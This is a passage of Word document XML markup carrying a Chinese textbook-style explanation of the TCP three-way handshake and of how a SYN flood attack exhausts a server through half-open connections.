        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>不同，它是基于连接的，也就是说：为了在服务端和客户端之间传送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据，必须先建立一个虚拟电路，也就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>连接，建立</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>连接的标准过程是这样的：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　首先，请求端（客户端）发送一个包含</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>标志的</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>报文，</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>即同步（</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Synchronize</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>），同步报文会指明客户端使用的端口以及</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>连接的初始序号；</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　第二步，服务器在收到客户端的</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>报文后，将返回一个</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SYN+ACK</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的报文，表示客户端的请求被接受，同时</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>序号被加一，</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ACK</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>即确认（</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Acknowledgment</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　第三步，客户端也返回一个确认报文</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ACK</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>给服务器端，同样</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>序列号被加一，到此一个</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="000744C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>连接完成。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　以上的连接过程在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议中被称为三次握手（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Three-way Handshake</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　问题就出在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>连接的三次握手中，假设一个用户向服务器发送了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>报文后突然死机或掉线，那么服务器在发出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SYN+ACK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>应答报文后是无法收到客户端的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ACK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>报文的（第三次握手无法完成），这种情况下服务器端一般会重试（再次发送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SYN+ACK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>给客户端）并等待一段时间后丢弃这个未完成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>的连接，这段时间的长度我们称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SYN Timeout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，一般来说这个时间是分钟的数量级（大约为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>秒</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>分钟）；一个用户出现异常导致服务器的一个线程等待</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>分钟并不是什么很大的问题，但如果有一个恶意的攻击者大量模拟这种情况，服务器端将为了维护一个非常大的</w:t>
      </w:r>
      <w:r w:rsidRPr="00760D30">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>半连接列表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>而消耗非常多的资源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>----</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数以万计的半连接，即使是简单的保存并遍历也会消耗非常多的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>时间和内存，何况还要不断对这个列表中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SYN+ACK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的重试。实际上如果服务器的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP/IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>栈不够强大，最后的结果往往是堆栈溢出崩溃</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>即使服务器端的系统足够强大，服务器端也将忙于处理攻击者伪造的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
